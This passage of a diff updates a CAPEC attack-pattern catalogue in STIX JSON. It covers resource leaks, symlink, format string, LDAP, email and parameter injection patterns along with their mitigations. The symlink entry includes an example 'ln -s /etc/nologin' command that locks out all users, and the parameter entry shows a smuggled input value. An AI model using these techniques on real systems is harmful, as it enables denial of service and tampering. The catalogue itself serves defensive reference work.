"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use resource-limiting settings, if possible.", "type": "course-of-action", - "id": "course-of-action--0357fe49-c292-4050-99b4-8fb8b212870b" + "id": "course-of-action--1fb6f288-179f-4b15-8414-32b5d480c21a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f36d7cf0-1290-47b3-9310-4aad50a195a3", - "source_ref": "course-of-action--0357fe49-c292-4050-99b4-8fb8b212870b", + "id": "relationship--e5f11d4b-2865-4d54-9f57-ad416f4ae3b3", + "source_ref": "course-of-action--1fb6f288-179f-4b15-8414-32b5d480c21a", "relationship_type": "mitigates", - "target_ref": "attack-pattern--defb6017-368d-4c28-bbc7-c4fabaf786f8" + "target_ref": "attack-pattern--289251fd-9402-48a7-aee0-28b8ba2b3e41" }, { "name": "Resource Leak Exposure", "description": "An adversary utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests. Resource leaks most often come in the form of memory leaks where memory is allocated but never released after it has served its purpose, however, theoretically, any other resource that can be reserved can be targeted if the target fails to release the reservation when the reserved resource block is no longer needed. In this attack, the adversary determines what activity results in leaked resources and then triggers that activity on the target. Since some leaks may be small, this may require a large number of requests by the adversary. However, this attack differs from a flooding attack in that the rate of requests is generally not significant. This is because the lost resources due to the leak accumulate until the target is reset, usually by restarting it. Thus, a resource-poor adversary who would be unable to flood the target can still utilize this attack. Resource depletion through leak differs from resource depletion through allocation in that, in the former, the adversary may not be able to control the size of each leaked allocation, but instead allows the leak to accumulate until it is large enough to affect the target's performance. When depleting resources through allocation, the allocated resource may eventually be released by the target so the attack relies on making sure that the allocation size itself is prohibitive of normal operations by the target.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -4250,90 +4284,91 @@ }, "x_capec_abstraction": "Meta", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--340df6e5-3ffa-48e5-83d3-b84c5350f790" + "id": "attack-pattern--7f7b1917-63bb-43a7-b36b-a90dbc6072e5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-131-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "If possible, leverage coding language(s) that do not allow this weakness to occur (e.g., Java, Ruby, and Python all perform automatic garbage collection that releases memory for objects that have been deallocated).", "type": "course-of-action", - "id": "course-of-action--9c397d2e-deb9-4e75-a3d2-5f051db3d204" + "id": "course-of-action--4bcc3ad0-15a6-460c-8082-77aea25f0ab0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--0b6bb385-7fce-417c-8fa2-f302cce0bc5b", - "source_ref": "course-of-action--9c397d2e-deb9-4e75-a3d2-5f051db3d204", + "id": "relationship--d1abf586-d257-4a72-b14d-44f92a3e45f5", + "source_ref": "course-of-action--4bcc3ad0-15a6-460c-8082-77aea25f0ab0", "relationship_type": "mitigates", - "target_ref": "attack-pattern--340df6e5-3ffa-48e5-83d3-b84c5350f790" + "target_ref": "attack-pattern--7f7b1917-63bb-43a7-b36b-a90dbc6072e5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-131-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Memory should always be allocated/freed using matching functions (e.g., malloc/free, new/delete, etc.)", "type": "course-of-action", - "id": "course-of-action--c5a276f1-55cd-4f86-a4e5-2844247d48d6" + "id": "course-of-action--737b495b-88cf-4045-81ad-c988de02409e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--329a6046-89ac-44dd-9d96-fd02287d6d78", - "source_ref": "course-of-action--c5a276f1-55cd-4f86-a4e5-2844247d48d6", + "id": "relationship--4b292e1b-e5c9-4b4e-93b9-4b3bc7b99237", + "source_ref": "course-of-action--737b495b-88cf-4045-81ad-c988de02409e", "relationship_type": "mitigates", - "target_ref": "attack-pattern--340df6e5-3ffa-48e5-83d3-b84c5350f790" + "target_ref": "attack-pattern--7f7b1917-63bb-43a7-b36b-a90dbc6072e5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-131-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implement best practices with respect to memory management, including the freeing of all allocated resources at all exit points and ensuring consistency with how and where memory is freed in a function.", "type": "course-of-action", - "id": "course-of-action--87d893b8-c8bc-4dde-9e05-ca61531f07b9" + "id": "course-of-action--14b2914a-fe72-4ed6-8a7b-1b4f29ad4acf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--e0f904c4-065c-496d-b3c7-5658040be02b", - "source_ref": "course-of-action--87d893b8-c8bc-4dde-9e05-ca61531f07b9", + "id": "relationship--b7a582bf-6fc4-41b5-aa82-24a573fc080f", + "source_ref": "course-of-action--14b2914a-fe72-4ed6-8a7b-1b4f29ad4acf", "relationship_type": "mitigates", - "target_ref": "attack-pattern--340df6e5-3ffa-48e5-83d3-b84c5350f790" + "target_ref": "attack-pattern--7f7b1917-63bb-43a7-b36b-a90dbc6072e5" }, { "name": "Symlink Attack", "description": "An attacker positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name. The endpoint file may be either output or input. If the file is output, the result is that the endpoint is modified, instead of a file at the intended location. Modifications to the endpoint file may include appending, overwriting, corrupting, changing permissions, or other modifications. In some variants of this attack the attacker may be able to control the change to a file while in other cases they cannot. The former is especially damaging since the attacker may be able to grant themselves increased privileges or insert false information, but the latter can also be damaging as it can expose sensitive information or corrupt or destroy vital system or application files. Alternatively, the endpoint file may serve as input to the targeted application. This can be used to feed malformed input into the target or to cause the target to process different information, possibly allowing the attacker to control the actions of the target or to cause the target to expose information to the attacker. Moreover, the actions taken on the endpoint file are undertaken with the permissions of the targeted user or application, which may exceed the permissions that the attacker would normally have.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -4402,65 +4437,66 @@ "\n The attacker creates a symlink with the \"same\" name as the file which the application is intending to write to. The application will write to the file- \"causing the data to be written where the symlink is pointing\". An attack like this can be demonstrated as follows:\n root# vulprog myFile\n {...program does some processing...]\n \n attacker# ln \u2013s /etc/nologin myFile\n [...program writes to 'myFile', which points to /etc/nologin...]\n \n \n In the above example, the root user ran a program with poorly written file handling routines, providing the filename \"myFile\" to vulnprog for the relevant data to be written to. However, the attacker happened to be looking over the shoulder of \"root\" at the time, and created a link from myFile to /etc/nologin. The attack would make no user be able to login.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--deaf3a4c-7ff5-4fb7-b9da-210634520fec" + "id": "attack-pattern--a511fff6-fe2b-4888-974d-265002b6ddac" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-132-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Check for the existence of files to be created, if in existence verify they are neither symlinks nor hard links before opening them.", "type": "course-of-action", - "id": "course-of-action--3e7e3a08-c431-4a95-b634-0192ff4a493e" + "id": "course-of-action--1fad77cc-fcbb-4256-9333-999394016ef9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--458234f7-1dfe-46c1-9a27-ab8ec2f793c3", - "source_ref": "course-of-action--3e7e3a08-c431-4a95-b634-0192ff4a493e", + "id": "relationship--e17c61dc-f469-462d-9568-39ce472f17a4", + "source_ref": "course-of-action--1fad77cc-fcbb-4256-9333-999394016ef9", "relationship_type": "mitigates", - "target_ref": "attack-pattern--deaf3a4c-7ff5-4fb7-b9da-210634520fec" + "target_ref": "attack-pattern--a511fff6-fe2b-4888-974d-265002b6ddac" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-132-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Use randomly generated file names for temporary files. Give the files restrictive permissions.", "type": "course-of-action", - "id": "course-of-action--4bb2f2c2-5170-45c1-998f-a79d111148b6" + "id": "course-of-action--5d27eaef-7db0-4804-958c-8b5624bbd8af" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--53cbc143-ef89-4f99-b570-e005ef47c3ad", - "source_ref": "course-of-action--4bb2f2c2-5170-45c1-998f-a79d111148b6", + "id": "relationship--ee78fdd8-4fe3-4b08-8cca-cbccb81b05cf", + "source_ref": "course-of-action--5d27eaef-7db0-4804-958c-8b5624bbd8af", "relationship_type": "mitigates", - "target_ref": "attack-pattern--deaf3a4c-7ff5-4fb7-b9da-210634520fec" + "target_ref": "attack-pattern--a511fff6-fe2b-4888-974d-265002b6ddac" }, { "name": "Try All Common Switches", "description": "An attacker attempts to invoke all common switches and options in the target application for the purpose of discovering weaknesses in the target. For example, in some applications, adding a --debug switch causes debugging information to be displayed, which can sometimes reveal sensitive processing or configuration information to an attacker. This attack differs from other forms of API abuse in that the attacker is blindly attempting to invoke options in the hope that one of them will work rather than specifically targeting a known option. Nonetheless, even if the attacker is familiar with the published options of a targeted application this attack method may still be fruitful as it might discover unpublicized functionality.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -4485,68 +4521,69 @@ ], "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--d3a92915-14ca-4edf-944a-e9c8b82bc2db" + "id": "attack-pattern--4d39083a-01db-4b17-a4b8-25037eb51560" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-133-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Minimize switch and option functionality to only that necessary for correct function of the command.", "type": "course-of-action", - "id": "course-of-action--05d13684-53b1-4336-b23a-d971dff56b9c" + "id": "course-of-action--ada16564-6893-4613-ab31-1956904689fa" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--86b7dac2-fa1e-45d8-9829-6578d0486549", - "source_ref": "course-of-action--05d13684-53b1-4336-b23a-d971dff56b9c", + "id": "relationship--91c36161-4a18-4529-8808-c0c86bf202c1", + "source_ref": "course-of-action--ada16564-6893-4613-ab31-1956904689fa", "relationship_type": "mitigates", - "target_ref": "attack-pattern--d3a92915-14ca-4edf-944a-e9c8b82bc2db" + "target_ref": "attack-pattern--4d39083a-01db-4b17-a4b8-25037eb51560" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-133-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Remove all debug and testing options from production code.", "type": "course-of-action", - "id": "course-of-action--e0f61e9c-43ef-45ad-9c89-12ce2e243df2" + "id": "course-of-action--52eb1f45-37ca-4bae-980d-8358d067e7fc" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--7e58d074-c073-4661-936f-cbcdcf48173e", - "source_ref": "course-of-action--e0f61e9c-43ef-45ad-9c89-12ce2e243df2", + "id": "relationship--287e77a8-6932-4aaf-89fb-fb8430c7fcf0", + "source_ref": "course-of-action--52eb1f45-37ca-4bae-980d-8358d067e7fc", "relationship_type": "mitigates", - "target_ref": "attack-pattern--d3a92915-14ca-4edf-944a-e9c8b82bc2db" + "target_ref": "attack-pattern--4d39083a-01db-4b17-a4b8-25037eb51560" }, { "name": "Email Injection", "description": "An attacker manipulates the headers and content of an email message by injecting data via the use of delimiter characters native to the protocol. Many applications allow users to send email messages by filling in fields. For example, a web site may have a link to \"share this site with a friend\" where the user provides the recipient's email address and the web application fills out all the other fields, such as the subject and body. In this pattern, an attacker adds header and body information to an email message by injecting additional content in an input field used to construct a header of the mail message. This attack takes advantage of the fact that RFC 822 requires that headers in a mail message be separated by a carriage return. As a result, an attacker can inject new headers or content simply by adding a delimiting carriage return and then supplying the new heading and body information. This attack will not work if the user can only supply the message body since a carriage return in the body is treated as a normal character.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -4569,18 +4606,19 @@ ], "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--a23476be-c4be-49d1-b19e-66d33ebde655" + "id": "attack-pattern--c4b5e88c-a86a-466f-a884-545bc54e6b4d" }, { "name": "Format String Injection", "description": "An adversary includes formatting characters in a string input field on the target application. Most applications assume that users will provide static text and may respond unpredictably to the presence of formatting character. For example, in certain functions of the C programming languages such as printf, the formatting character %s will print the contents of a memory location expecting this location to identify a string and the formatting character %n prints the number of DWORD written in the memory. An adversary can use this to read or write to memory locations or files, or simply to manipulate the value of the resulting text in unexpected ways. Reading or writing memory may result in program crashes and writing memory could result in the execution of arbitrary code if the adversary can write to the program stack.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -4654,65 +4692,66 @@ "Untrusted search path vulnerability in the add_filename_to_string function in intl/gettext/loadmsgcat.c for Elinks 0.11.1 allows local users to cause Elinks to use an untrusted gettext message catalog (.po file) in a \"../po\" directory, which can be leveraged to conduct format string attacks. See also: CVE-2007-2027" ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--fe23a38e-d652-4e91-b197-db676e7b73a3" + "id": "attack-pattern--d8b7836a-85a5-43ea-bc79-c6303137f74d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-135-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Limit the usage of formatting string functions.", "type": "course-of-action", - "id": "course-of-action--26a43aed-39a8-4e2d-b156-25e3d4626ea9" + "id": "course-of-action--3a74698d-3c03-4e02-8576-c503ba6b8989" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--83644d75-28fd-4f8e-8f82-20d86c539c85", - "source_ref": "course-of-action--26a43aed-39a8-4e2d-b156-25e3d4626ea9", + "id": "relationship--37a4a4d5-c754-4240-b263-f60dc1d87d22", + "source_ref": "course-of-action--3a74698d-3c03-4e02-8576-c503ba6b8989", "relationship_type": "mitigates", - "target_ref": "attack-pattern--fe23a38e-d652-4e91-b197-db676e7b73a3" + "target_ref": "attack-pattern--d8b7836a-85a5-43ea-bc79-c6303137f74d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-135-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal formatting characters.", "type": "course-of-action", - "id": "course-of-action--53b55137-c695-402b-9301-d3779c12e2fe" + "id": "course-of-action--7baed235-1f33-4e25-bdf6-eabc38355a9b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--892ff00b-2933-4d5f-92c1-ee4af20b19be", - "source_ref": "course-of-action--53b55137-c695-402b-9301-d3779c12e2fe", + "id": "relationship--81eac75b-00a6-48c3-87f6-c8f490b8074c", + "source_ref": "course-of-action--7baed235-1f33-4e25-bdf6-eabc38355a9b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--fe23a38e-d652-4e91-b197-db676e7b73a3" + "target_ref": "attack-pattern--d8b7836a-85a5-43ea-bc79-c6303137f74d" }, { "name": "LDAP Injection", "description": "An attacker manipulates or crafts an LDAP query for the purpose of undermining the security of the target. Some applications use user input to create LDAP queries that are processed by an LDAP server. For example, a user might provide their username during authentication and the username might be inserted in an LDAP query during the authentication process. An attacker could use this input to inject additional commands into an LDAP query that could disclose sensitive information. For example, entering a * in the aforementioned query might return information about all users on the system. This attack is very similar to an SQL injection attack in that it manipulates a query to gather additional information or coerce a particular return value.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -4785,65 +4824,66 @@ "PowerDNS before 2.9.18, when running with an LDAP backend, does not properly escape LDAP queries, which allows remote attackers to cause a denial of service (failure to answer ldap questions) and possibly conduct an LDAP injection attack. See also: CVE-2005-2301" ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--fa9cc505-d50e-411f-a30c-d9c2eb067f5d" + "id": "attack-pattern--1424c88c-eb3f-48c8-a92a-97505119e464" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-136-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as LDAP content.", "type": "course-of-action", - "id": "course-of-action--053254cf-4475-4741-90eb-7ccabcf79ae5" + "id": "course-of-action--860deb05-098f-491a-b16a-b8e57469c59d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--94c83e66-c749-4424-b3a0-2fe27ffd48aa", - "source_ref": "course-of-action--053254cf-4475-4741-90eb-7ccabcf79ae5", + "id": "relationship--9b6f79fa-271d-4307-90be-f07986141adf", + "source_ref": "course-of-action--860deb05-098f-491a-b16a-b8e57469c59d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--fa9cc505-d50e-411f-a30c-d9c2eb067f5d" + "target_ref": "attack-pattern--1424c88c-eb3f-48c8-a92a-97505119e464" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-136-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the LDAP or application.", "type": "course-of-action", - "id": "course-of-action--d5ea6ce6-907f-497d-8e57-6b4f9596ff0d" + "id": "course-of-action--a94284e2-a896-420f-b357-6008b0cbd10f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--16a83ad8-197a-41b5-9505-b390be48d2ba", - "source_ref": "course-of-action--d5ea6ce6-907f-497d-8e57-6b4f9596ff0d", + "id": "relationship--8888fb2f-589c-4fad-b1c4-a650025959fe", + "source_ref": "course-of-action--a94284e2-a896-420f-b357-6008b0cbd10f", "relationship_type": "mitigates", - "target_ref": "attack-pattern--fa9cc505-d50e-411f-a30c-d9c2eb067f5d" + "target_ref": "attack-pattern--1424c88c-eb3f-48c8-a92a-97505119e464" }, { "name": "Parameter Injection", "description": "An adversary manipulates the content of request parameters for the purpose of undermining the security of the target. Some parameter encodings use text characters as separators. For example, parameters in a HTTP GET message are encoded as name-value pairs separated by an ampersand (&). If an attacker can supply text strings that are used to fill in these parameters, then they can inject special characters used in the encoding scheme to add or modify parameters. For example, if user input is fed directly into an HTTP GET request and the user provides the value \"myInput&new_param=myValue\", then the input parameter is set to myInput, but a new parameter (new_param) is also added with a value of myValue. This can significantly change the meaning of the query that is processed by the server. Any encoding scheme where parameters are identified and separated by text characters is potentially vulnerable to this attack - the HTTP GET encoding used above is just one example.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -4875,68 +4915,69 @@ }, "x_capec_abstraction": "Meta", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--24bbcaec-19bb-4964-b8a1-cd6421844123" + "id": "attack-pattern--35464428-e136-4677-aaa0-19da2fe51c55" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-137-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implement an audit log written to a separate host. In the event of a compromise, the audit log may be able to provide evidence and details of the compromise.", "type": "course-of-action", - "id": "course-of-action--b47eac39-b263-4c1e-8d06-d1f2040af7be" + "id": 